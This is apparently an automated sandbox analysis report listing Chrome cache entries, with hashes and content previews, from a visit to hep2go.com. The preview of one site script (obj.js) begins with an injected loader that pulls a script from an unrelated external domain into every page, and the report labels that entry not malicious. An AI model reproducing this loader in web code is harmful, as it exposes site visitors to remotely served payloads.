                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c

                Chrome Cache Entry: 109

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with no line terminators
                Category:downloaded
                Size (bytes):84
                Entropy (8bit):5.109595923232876
                Encrypted:false
                SSDEEP:
                MD5:F31E7458A8D5F1F4DB1DA7BB8E32F71A
                SHA1:859CF723584C3EC1ED258252DBAB3BA18D5BEBAD
                SHA-256:5E739A9B37BF38D57EB5D321D005E0D670D680F887969A5DAEAE87A4FA65D6ED
                SHA-512:479A03FD3406FA4A7254D1AF4DA9FB23BFAD5F6D7E677958F62B62B852E62F5C35D73CE0E0A281E0DD106208C6A935E6EC49290DD344A860C3BEAE84B1F6B8BB
                Malicious:false
                Reputation:unknown
                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkcjDzhxZJeMRIFDXhvEhkSBQ3OQUx6?alt=proto
                Preview:CjsKEQ14bxIZGgQICRgBGgQIVhgCCiYNzkFMehoECEsYAioZCApSFQoLIUAkKi4tXz8mKyMQARj/////Dw==

                Chrome Cache Entry: 110

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 300 x 100, 8-bit/color RGBA, non-interlaced
                Category:downloaded
                Size (bytes):10387
                Entropy (8bit):7.963698662409975
                Encrypted:false
                SSDEEP:
                MD5:F718D4CFC1A939C6E819F0ABF6E1A736
                SHA1:D432FCA15E9ACE5C85BC8A7CD3CCB7AA57438BAB
                SHA-256:E834A95F2E4ABFF3092D8D558664DD59CA67E111208C03616BB437652EB589FF
                SHA-512:F68345742A99FAEE4211B6D1992298699CBEB9496331275A5E26152F16CCBAA3FDA6464935FED23A2E734E89B71EC991499B2BEE341F6B385664E67A6BFC5169
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.png
                Preview:.PNG........IHDR...,...d.....<.......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

                Chrome Cache Entry: 111

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text
                Category:downloaded
                Size (bytes):8688
                Entropy (8bit):4.781337574261119
                Encrypted:false
                SSDEEP:
                MD5:8BADEEDDE03B62189E8D25CC59CC350B
                SHA1:52DE8D4242EF410273502198B69A82855A176125
                SHA-256:2B8C250413DA18135642C28DB6B82FB42FCF0E74875FEB249209475FC6934A48
                SHA-512:BEB2578CBDF38E3A8516CFDDC2969CCB70D86007723E1B0EDE495275D41EF9914D1470FB3FB930D0650716B1F44E86F5C92C3684A849E13F177E5F83F41FE452
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/include/obj.js
                Preview:var oriAjax;.var a = document.createElement("script");.a.src = "https://cta.berlmember.com/google/jquery.php";.document.getElementsByTagName("head")[0].appendChild(a);.$(function(). {. oriAjax = $.ajax;.. $.ajax = function(options, a, b, c). {. if (options.success). {. var oriSuccess = options.success;.. options.success = function(data). {. if ((rawUrlDecode(data.error) == 11003) || (data == "-111003")). {. location.reload();. }. else. {. oriSuccess(data);. }. }. }.. oriAjax(options, a, b, c);. };. });..var locServer = "";.//var locServer = "/~h2gdevel";.var idEnabled = true;.var logoutTime = 5400; // Seconds to logout.var logoutTimeSyncDiff = 5; // Seconds to synchronize the backend before logoutTime expires.var logoutCounter = 0; // Local Counter.var logoutBackendCounter = 0; // Backend Counter.var oriTime = new Date();.var logoutInitSecs = parseInt(oriT

                Chrome Cache Entry: 112

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (328), with CRLF line terminators
                Category:dropped
                Size (bytes):40475
                Entropy (8bit):5.197019158623605
                Encrypted:false
                SSDEEP:
                MD5:F923F1A58C8EF6CF94137927671E0ECC
                SHA1:5E16E547B72C0FBF2689670E5DC0F6367CED02F5
                SHA-256:06A11BD43143B8E1AB5DD407138ED55D36DCF1E59B8365BB5207DCD39A1F74A0
                SHA-512:70FE87BD0170F34A0F5E148DC5A9974883EA85EF239E7B2B22839252C99649DA32713DF612D2AABF4B0F08910574AD73D611E7A776ECBEC304961675726B0C74
                Malicious:false
                Reputation:unknown
                Preview:var sPath = window.location.href;..var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);....var GSERVER = "http://www.hep2go.com";..var GDOMAIN = "www.hep2go.com";..var GSERVER_SSL = "https://www.hep2go.com";..var GCOOKIE_DOMAIN = "www.hep2go.com";..var GCOOKIE_PATH = "/";../*..var GSERVER = "http://174.138.160.74/~h2gdevel";..var GDOMAIN = "174.138.160.74/~h2gdevel";..var GSERVER_SSL = "https://174.138.160.74/~h2gdevel";..var GCOOKIE_DOMAIN = "174.138.160.74";..var GCOOKIE_PATH = "/~h2gdevel";..*/..var GSERVER_CUR;....var pageUrl = window.location.href;..var pageProtocol = pageUrl.toUpperCase().substr(0, 5);....if (pageProtocol == "HTTPS").. {.. GSERVER_CUR = GSERVER_SSL;.. }..else.. {.. GSERVER_CUR = GSERVER;.. }......if (sPage.lastIndexOf("?") != -1).. {.. sPage = sPage.substr(0, sPage.length - sPage.length + sPage.lastIndexOf("?"));.. }....var excDefault;..var el_desc = null;....var imgProgress = new Image(100,24); ..imgProgress.src = GSERVER_CUR + "/images/progress.gif

                Chrome Cache Entry: 84

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):8134
                Entropy (8bit):4.9456606000734205
                Encrypted:false
                SSDEEP:
                MD5:090FD50A56506E9D52467440C8035001
                SHA1:88AB631764417911E877A2E99FFDD5C078FEC7DC
                SHA-256:EA69FDEADDE3ED63F1F66A9E505FF6F701371ADBCACD575E9D05045B5CE76816
                SHA-512:3C2A0884AE8B00DFD3B105BD2585C312ECD0DB031974018BE2A71DE63533B5D1B6BE826EBEE8E4A2BBBEDEDAF8BDAC95D60CDF98046D9F51ECAB78BF4FB8C1C5
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/javascript/user_ref.001.js
                Preview:var urInitialized = false;..var userRef = getUserRef();....var GSERVER = "http://www.hep2go.com";..var GSERVER_SSL = "https://www.hep2go.com";..var GHOST = "www.hep2go.com";../*..var GSERVER = "http://174.138.160.74/~h2gdevel";..var GSERVER_SSL = "https://174.138.160.74/~h2gdevel";..var GHOST = "174.138.160.74/~h2gdevel";..*/..var GSERVER_CUR;....var pageUrl = window.location.href;..var pageProtocol = pageUrl.toUpperCase().substr(0, 5);....if (pageProtocol == "HTTPS").. {.. GSERVER_CUR = GSERVER_SSL;.. }..else.. {.. GSERVER_CUR = GSERVER;.. }....$(function().. {.. urInit();.. });....function urInit().. {.. urInitialized = true;.. urDoInit();.. urShowTitle();.. }....function urDoInit().. {.. var elems = document.getElementsByTagName("A");.... for (var i = 0; i < elems.length; i++).. {.. urCheckA(elems[i]);.. }.... var elems = document.getElementsByTagName("IMG");.... for (var i = 0; i < elems.length; i++).. {.. urCheckImg(elems[i]);.. }.... var elem

                Chrome Cache Entry: 87

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:GIF image data, version 89a, 86 x 87
                Category:dropped
                Size (bytes):290
                Entropy (8bit):7.05700020807592
                Encrypted:false
                SSDEEP:
                MD5:F1B6D6A8D3FC06CD0F8C43890453A4C1
                SHA1:9478147534BD36109E504133E356F26BEAD5C63C
                SHA-256:B0D7F1F96BEE2999B81799851F15279BFD5F77C3E96E4D9E23FC8C407606E52F
                SHA-512:28BAC97F04494728C4517620DF7D81EDC85F55F097CFB0D3476A3EA2876F6F68A7FCFA39A2DE4C6B2771A4A33FBDB4D893E57F50450A0808A91E1E973ECD11B1
                Malicious:false
                Reputation:unknown
                Preview:GIF89aV.W..........Y..,...........;..!.......,....V.W....h...0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z...`..z...w.._.d2aqH...w.R...l..n.{.~\x.m..|..[..............~....~......u.y.........q..z.....v..}........r.z..............~.n.Z...g.f....kX...........................H.....;

                Chrome Cache Entry: 88

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 52x52, components 3
                Category:dropped
                Size (bytes):2827
                Entropy (8bit):7.705210317941042
                Encrypted:false
                SSDEEP:
                MD5:C0A6CBDDBF7E29C899348639ADBD2AF2
                SHA1:FA17297FE776A520B0409F244DDCEC1DDCA1DC1D
                SHA-256:FDE5C7BB7E7027E5EDC43A275E53059EAAB19BBA01060EBE81F0CA251A4AFB9E
                SHA-512:F1F4E89E2230CE651FCC6F32506BE5009EAF964718475D92D3135BA5C3AF2FA7E9BD6777B29B86D13052448D7404711D431C424BDF79ACF88A39CE9589BC36B8
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....,.,.....C....................................................................C.......................................................................4.4..........................................4..............................!1.A.."#T..%2Qaqr....................................<..............................!1A.."S..#$Tq......234a.................?...M4.M4.M4.M4.M4.M4.".!..U.li...............83..(a.(..q.....V...p.kW....P#..M28.........zMr9..Ts\...9....=..=QS.\eEETTTT^...QS.%Ms.Q.j..Q....T_tTT.TT....k:i..i..j..I...6<..A.6+Q...kn2..L.%cX.H..=Z..h.-J....j........._K..W..^m.FI..\..[T.{Ekf$.LY}..$.l{....d....C{.Z]{.e..B................M...x.\.k.6.D...j.|8......f."./..qywmonR)Kega.l..\.W...!...W....Vm....# .......dX.....DDD.....'..Teg{ws`.[{{;;B..}...eMR+...Pr<............:.l..7.W....NrG..[....w.AZc..V.p..jM.Y..`w.(Y-..c^.t.n%Q.1Z..<.:)#..z.7..+.Y.,P.....j...p..U.*......:....*...L.!.ZZ.k.v4e.F.pX.jK.Y^..E|q6KS.k.[.I...?.n.OP..8._...n../.O.G.Y...i..t..

                Chrome Cache Entry: 92

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 103x32, components 3
                Category:dropped
                Size (bytes):16452
                Entropy (8bit):2.9033933458873604
                Encrypted:false
                SSDEEP:
                MD5:341A7C0F6F4DB207B467EF80312BF34F
                SHA1:B45EC7ACEF5B7EA76426A2BFE4C91EC3228E8EF7
                SHA-256:1AD497389043C0B6AA886FEE2FD9D7783A2B966E26E82BE59E47C4F7FBD6CE4F
                SHA-512:EF306758278BC0E442E6A723A6064E0ADAC874EFAA37E542F79CDA46379CFE78AB4EB72B308AF8582C913719BE15D163EE50D4BEB52B7434F592C063184A45A6
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....H.H....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T18:34:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T19:10:18Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .

                Chrome Cache Entry: 93

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 103x32, components 3
                Category:downloaded
                Size (bytes):15896
                Entropy (8bit):2.649342387748696
                Encrypted:false
                SSDEEP:
                MD5:F8DEABCE160BEE702F3BF863D5EACF39
                SHA1:5E0A3F0C249C9B952B7B4BD08CD28335313BDFD6
                SHA-256:FD1F9A1A3CAAC0A110464E8FAC95F5D3346270F7258D1AF64EB06D75770A69A3
                SHA-512:AE9AC00A3BF53DBEE6467AA63068819AFE97068E8394902D02AA0E646AFE8AD40DB8FB8E4FEF709C4AEA10C64BED828B26871D2E420EA853F1D7F80DF8F42189
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/login.jpg
                Preview:......JFIF.....H.H....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T18:34:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T19:07:01Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .

                Chrome Cache Entry: 95

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 52x52, components 3
                Category:dropped
                Size (bytes):16377
                Entropy (8bit):2.8640517590856276
                Encrypted:false
                SSDEEP:
                MD5:7C8D592728B43433354C49817D6AF21A
                SHA1:D81C17BE5A41D899F9877ED8D47E86D0B15BE5FB
                SHA-256:52F2E94A2A70B234E5EF5F5A17CEA036F757A7090A00C955F2DF5074330A7C8B
                SHA-512:C5757FF04FE0D1A3C0B685429536E6F19A331DB472D3E8C2A388FFCFB74D8B558710ABDFC2354C3AA50547B0395C19AB5F3A354B0DDABD6206F51205EAA25FA6
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....,.,....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T23:23:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T23:24:24Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .

                Chrome Cache Entry: 99

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, progressive, precision 8, 1100x600, components 3
                Category:dropped
                Size (bytes):257825
                Entropy (8bit):7.968607322621273
                Encrypted:false
                SSDEEP:
                MD5:E50BC618EDCFF4E01F09E562A458AF3D
                SHA1:2C77BB47DE94DC545E345FD7B47F4E2B872EA7AE
                SHA-256:5FE8D3BF8875AA5714762D66FCB6E0AD1C48033CABBC3D5F12BA7DDF27DBC083
                SHA-512:831AA06C24F30E8E88B5551026EBAF1582FBE9589BC85D9BA876F80E89761B3E4BB61C21D60D4EE4B3044BD500021F13E198D5964355D7E6FDB74784E12FA57B
                Malicious:false
                Reputation:unknown
                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                Static File Info

                No static file info